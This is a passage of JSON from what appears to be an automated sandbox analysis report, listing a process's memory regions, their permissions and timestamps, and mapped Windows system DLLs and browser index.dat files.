40959999, "entry_point": 0, "filename": null, "id": "region_4066", "name": "private_0x00000000026d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 40697856, "timestamp": "00:07:38.138", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 41287680, "type": "region", "version": 1 }, "end_va": 41549823, "entry_point": 0, "filename": null, "id": "region_4067", "name": "private_0x0000000002760000", "norm_filename": null, "region_type": "private_memory", "start_va": 41287680, "timestamp": "00:07:38.138", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 41549824, "type": "region", "version": 1 }, "end_va": 41811967, "entry_point": 0, "filename": null, "id": "region_4068", "name": "private_0x00000000027a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 41549824, "timestamp": "00:07:38.138", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 41811968, "type": "region", "version": 1 }, "end_va": 42074111, "entry_point": 0, "filename": null, "id": "region_4069", "name": "private_0x00000000027e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 41811968, "timestamp": "00:07:38.138", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 42860544, "type": "region", "version": 1 }, "end_va": 43122687, "entry_point": 0, "filename": null, "id": "region_4070", "name": "private_0x00000000028e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 42860544, "timestamp": "00:07:38.138", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 43253760, "type": "region", "version": 1 }, "end_va": 43515903, "entry_point": 0, "filename": null, "id": "region_4071", "name": "private_0x0000000002940000", "norm_filename": null, "region_type": "private_memory", "start_va": 43253760, "timestamp": "00:07:38.138", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 43581440, "type": "region", "version": 1 }, "end_va": 43843583, "entry_point": 0, "filename": null, "id": "region_4072", "name": "private_0x0000000002990000", "norm_filename": null, "region_type": "private_memory", "start_va": 43581440, "timestamp": "00:07:38.138", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130292736, "type": "region", "version": 1 }, "end_va": 2130305023, "entry_point": 0, "filename": null, "id": "region_4073", "name": "private_0x000000007ef9b000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130292736, "timestamp": "00:07:38.138", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130305024, "type": "region", "version": 1 }, "end_va": 2130317311, "entry_point": 0, "filename": null, "id": "region_4074", "name": "private_0x000000007ef9e000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130305024, "timestamp": "00:07:38.138", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130317312, "type": "region", "version": 1 }, "end_va": 2130329599, "entry_point": 0, "filename": null, "id": "region_4075", "name": "private_0x000000007efa1000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130317312, "timestamp": "00:07:38.138", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130329600, "type": "region", "version": 1 }, "end_va": 2130341887, "entry_point": 0, "filename": null, "id": "region_4076", "name": "private_0x000000007efa4000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130329600, "timestamp": "00:07:38.138", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130341888, "type": "region", "version": 1 }, "end_va": 2130354175, "entry_point": 0, "filename": null, "id": "region_4077", "name": "private_0x000000007efa7000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130341888, "timestamp": "00:07:38.138", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_4078", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:07:38.138", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_4079", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:07:38.138", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_4080", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:07:38.138", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 794623, "entry_point": 0, "filename": null, "id": "region_4081", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:07:38.147", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1967718400, "type": "region", "version": 1 }, "end_va": 1969414143, "entry_point": 1967718400, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "id": "region_4082", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1967718400, "timestamp": "00:07:38.147", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 856063, "entry_point": 851968, "filename": "\\Windows\\WindowsShell.Manifest", "id": "region_4083", "name": "windowsshell.manifest", "norm_filename": "c:\\windows\\windowsshell.manifest", "region_type": "memory_mapped_file", "start_va": 851968, "timestamp": "00:07:38.148", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 925695, "entry_point": 0, "filename": null, "id": "region_4084", "name": "pagefile_0x00000000000e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 917504, "timestamp": "00:07:38.148", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 856063, "entry_point": 0, "filename": null, "id": "region_4085", "name": "pagefile_0x00000000000d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 851968, "timestamp": "00:07:38.152", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1970077696, "type": "region", "version": 1 }, "end_va": 1970122751, "entry_point": 1970077696, "filename": "\\Windows\\SysWOW64\\profapi.dll", "id": "region_4086", "name": "profapi.dll", "norm_filename": "c:\\windows\\syswow64\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 1970077696, "timestamp": "00:07:38.155", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 49152, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1294335, "entry_point": 1245184, "filename": "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat", "id": "region_4087", "name": "index.dat", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 1245184, "timestamp": "00:07:38.161", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 32768, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1343487, "entry_point": 1310720, "filename": "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat", "id": "region_4088", "name": "index.dat", "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat", "region_type": "memory_mapped_file", "start_va": 1310720, "timestamp": "00:07:38.162", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1441791, "entry_point": 1376256, "filename": "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat", "id": "region_4089", "name": "index.dat", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 1376256, "timestamp": "00:07:38.163", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 196608, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1638399, "entry_point": 0, "filename": null, "id": "region_4108", "name": "private_0x0000000000160000", "norm_filename": null, "region_type": "private_memory", "start_va": 1441792, "timestamp": "00:07:38.209", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 135168, "start_va": 1967521792, "type": "region", "version": 1 }, "end_va": 1967656959, "entry_point": 1967521792, "filename": "\\Windows\\SysWOW64\\ntmarta.dll", "id": "region_4109", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\syswow64\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 1967521792, "timestamp": "00:07:38.213", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 282624, "start_va": 1989148672, "type": "region", "version": 1 }, "end_va": 1989431295, "entry_point": 1989148672, "filename": "\\Windows\\SysWOW64\\Wldap32.dll", "id": "region_4110", "name": "wldap32.dll", "norm_filename": "c:\\windows\\syswow64\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 1989148672, "timestamp": "00:07:38.214", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 2004746240, "type": "region", "version": 1 }, "end_va": 2004963327, "entry_point": 2004746240, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_4111", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 2004746240, "timestamp": "00:07:38.215", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1988034560, "type": "region", "version": 1 }, "end_va": 1988059135, "entry_point": 1988034560, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_4112", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1988034560, "timestamp": "00:07:38.215", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 42074112, "type": "region", "version": 1 }, "end_va": 42860543, "entry_point": 0, "filename": null, "id": "region_4113", "name": "private_0x0000000002820000", "norm_filename": null, "region_type": "private_memory", "start_va": 42074112, "timestamp": "00:07:38.216", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 278528, "start_va": 1967194112, "type": "region", "version": 1 }, "end_va": 1967472639, "entry_point": 1967194112, "filename": "\\Windows\\SysWOW64\\dnsapi.dll", "id": "region_4114", "name": "dnsapi.dll", "norm_filename": "c:\\windows\\syswow64\\dnsapi.dll", "region_type": "memory_mapped_file", "start_va": 1967194112, "timestamp": "00:07:38.221", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 327680, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1769471, "entry_point": 0, "filename": null, "id": "region_4115", "name": "private_0x0000000000160000", "norm_filename": null, "region_type": "private_memory", "start_va": 1441792, "timestamp": "00:07:38.222", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 114688, "start_va": 1969946624, "type": "region", "version": 1 }, "end_va": 1970061311, "entry_point": 1969946624, "filename": "\\Windows\\SysWOW64\\IPHLPAPI.DLL", "id": "region_4116", "name": "iphlpapi.dll", "norm_filename": "c:\\windows\\syswow64\\iphlpapi.dll", "region_type": "memory_mapped_file", "start_va": 1969946624, "timestamp": "00:07:38.222", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1970143232, "type": "region", "version": 1 }, "end_va": 1970171903, "entry_point": 1970143232, "filename": "\\Windows\\SysWOW64\\winnsi.dll", "id": "region_4117", "name": "winnsi.dll", "norm_filename": "c:\\windows\\syswow64\\winnsi.dll", "region_type": "memory_mapped_file", "start_va": 1970143232, "timestamp": "00:07:38.223", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 43843584, "type": "region", "version": 1 }, "end_va": 44892159, "entry_point": 0, "filename": null, "id": "region_4118", "name": "private_0x00000000029d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 43843584, "timestamp": "00:07:38.223", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 42205184, "type": "region", "version": 1 }, "end_va": 42467327, "entry_point": 0, "filename": null, "id": "region_4119", "name": "private_0x0000000002840000", "norm_filename": null, "region_type": "private_memory", "start_va": 42205184, "timestamp": "00:07:38.234", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 42598400, "type": "region", "version": 1 }, "end_va": 42860543, "entry_point": 0, "filename": null, "id": "region_4120", "name": "private_0x00000000028a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 42598400, "timestamp": "00:07:38.234", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 45547520, "type": "region", "version": 1 }, "end_va": 45809663, "entry_point": 0, "filename": null, "id": "region_4121", "name": "private_0x0000000002b70000", "norm_filename": null, "region_type": "private_memory", "start_va": 45547520, "timestamp": "00:07:38.234", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967157247, "entry_point": 1967063040, "filename": "\\Windows\\SysWOW64\\userenv.dll", "id": "region_4122", "name": "userenv.dll", "norm_filename": "c:\\windows\\syswow64\\userenv.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:07:38.234", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 184320, "start_va": 1990459392, "type": "region", "version": 1 }, "end_va": 1990643711, "entry_point": 1990459392, "filename": "\\Windows\\SysWOW64\\wintrust.dll", "id": "region_4124", "name": "wintrust.dll", "norm_filename": "c:\\windows\\syswow64\\wintrust.dll", "region_type": "memory_mapped_file", "start_va": 1990459392, "timestamp": "00:07:38.236", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 237568, "start_va": 1966800896, "type": "region", "version": 1 }, "end_va": 1967038463, "entry_point": 1966800896, "filename": "\\Windows\\SysWOW64\\schannel.dll", "id": "region_4125", "name": "schannel.dll", "norm_filename": "c:\\windows\\syswow64\\schannel.dll", "region_type": "memory_mapped_file", "start_va": 1966800896, "timestamp": "00:07:38.238", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 46137344, "type": "region", "version": 1 }, "end_va": 46399487, "entry_point": 0, "filename": null, "id": "region_4126", "name": "private_0x0000000002c00000", "norm_filename": null, "region_type": "private_memory", "start_va": 46137344, "timestamp": "00:07:38.239", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 46596096, "type": "region", "version": 1 }, "end_va": 46858239, "entry_point": 0, "filename": null, "id": "region_4127", "name": "private_0x0000000002c70000", "norm_filename": null, "region_type": "private_memory", "start_va": 46596096, "timestamp": "00:07:38.239", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130280448, "type": "region", "version": 1 }, "end_va": 2130292735, "entry_point": 0, "filename": null, "id": "region_4128", "name": "private_0x000000007ef98000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130280448, "timestamp": "00:07:38.239", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 335872, "start_va": 1966407680, "type": "region", "version": 1 }, "end_va": 1966743551, "entry_point": 1966407680, "filename": "\\Windows\\SysWOW64\\rasapi32.dll", "id": "region_4129", "name": "rasapi32.dll", "norm_filename": "c:\\windows\\syswow64\\rasapi32.dll", "region_type": "memory_mapped_file", "start_va": 1966407680, "timestamp": "00:07:38.240", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 86016, "start_va": 1966276608, "type": "region", "version": 1 }, "end_va": 1966362623, "entry_point": 1966276608, "filename": "\\Windows\\SysWOW64\\rasman.dll", "id": "region_4130", "name": "rasman.dll", "norm_filename": "c:\\windows\\syswow64\\rasman.dll", "region_type": "memory_mapped_file", "start_va": 1966276608, "timestamp": "00:07:38.241", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1969881088, "type": "region", "version": 1 }, "end_va": 1969934335, "entry_point": 1969881088, "filename": "\\Windows\\SysWOW64\\rtutils.dll", "id": "region_4131", "name": "rtutils.dll", "norm_filename": "c:\\windows\\syswow64\\rtutils.dll", "region_type": "memory_mapped_file", "start_va": 1969881088, "timestamp": "00:07:38.242", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1445887, "entry_point": 0, "filename": null, "id": "region_4132", "name": "private_0x0000000000160000", "norm_filename": null, "region_type": "private_memory", "start_va": 1441792, "timestamp": "00:07:38.245", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1769471, "entry_point": 0, "filename": null, "id": "region_4133", "name": "private_0x0000000000170000", "norm_filename": null, "region_type": "private_memory", "start_va": 1507328, "timestamp": "00:07:38.245", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1445887, "entry_point": 0, "filename": null, "id": "region_4134", "name": "pagefile_0x0000000000160000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1441792, "timestamp": "00:07:38.245", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1966211072, "type": "region", "version": 1 }, "end_va": 1966235647, "entry_point": 1966211072, "filename": "\\Windows\\SysWOW64\\SensApi.dll", "id": "region_4135", "name": "sensapi.dll", "norm_filename": "c:\\windows\\syswow64\\sensapi.dll", "region_type": "memory_mapped_file", "start_va": 1966211072, "timestamp": "00:07:38.252", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 1966080000, "type": "region", "version": 1 }, "end_va": 1966145535, "entry_point": 1966080000, "filename": "\\Windows\\SysWOW64\\nlaapi.dll", "id": "region_4170", "name": "nlaapi.dll", "norm_filename": "c:\\windows\\syswow64\\nlaapi.dll", "region_type": "memory_mapped_file", "start_va": 1966080000, "timestamp": "00:07:38.290", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1114112, "start_va": 46858240, "type": "region", "version": 1 }, "end_va": 47972351, "entry_point": 0, "filename": null, "id": "region_4171", "name": "private_0x0000000002cb0000", "norm_filename": null, "region_type": "private_memory", "start_va": 46858240, "timestamp": "00:07:38.290", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1114112, "start_va": 47972352, "type": "region", "version": 1 }, "end_va": 49086463, "entry_point": 0, "filename": null, "id": "region_4172", "name": "private_0x0000000002dc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 47972352, "timestamp": "00:07:38.291", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1835008, "start_va": 49086464, "type": "region", "version": 1 }, "end_va": 50921471, "entry_point": 0, "filename": null, "id": "region_4173", "name": "private_0x0000000002ed0000", "norm_filename": null, "region_type": "private_memory", "start_va": 49086464, "timestamp": "00:07:38.291", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 39976960, "type": "region", "version": 1 }, "end_va": 40239103, "entry_point": 0, "filename": null, "id": "region_4183", "name": "private_0x0000000002620000", "norm_filename": null, "region_type": "private_memory", "start_va": 39976960, "timestamp": "00:07:38.306", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 45875200, "type": "region", "version": 1 }, "end_va": 46137343, "entry_point": 0, "filename": null, "id": "region_4184", "name": "private_0x0000000002bc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 45875200, "timestamp": "00:07:38.306", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130268160, "type": "region", "version": 1 }, "end_va": 2130280447, "entry_point": 0, "filename": null, "id": "region_4185", "name": "private_0x000000007ef95000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130268160, "timestamp": "00:07:38.306", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1966145536, "type": "region", "version": 1 }, "end_va": 1966170111, "entry_point": 1966145536, "filename": "\\Windows\\SysWOW64\\rasadhlp.dll", "id": "region_4186", "name": "rasadhlp.dll", "norm_filename": "c:\\windows\\syswow64\\rasadhlp.dll", "region_type": "memory_mapped_file", "start_va": 1966145536, "timestamp": "00:07:38.308", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 44892160, "type": "region", "version": 1 }, "end_va": 45154303, "entry_point": 0, "filename": null, "id": "region_4226", "name": "private_0x0000000002ad0000", "norm_filename": null, "region_type": "private_memory", "start_va": 44892160, "timestamp": "00:07:38.384", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 48103424, "type": "region", "version": 1 }, "end_va": 48365567, "entry_point": 0, "filename": null, "id": "region_4227", "name": "private_0x0000000002de0000", "norm_filename": null, "region_type": "private_memory", "start_va": 48103424, "timestamp": "00:07:38.384", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 49020928, "type": "region", "version": 1 }, "end_va": 49086463, "entry_point": 0, "filename": null, "id": "region_4228", "name": "private_0x0000000002ec0000", "norm_filename": null, "region_type": "private_memory", "start_va": 49020928, "timestamp": "00:07:38.384", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ 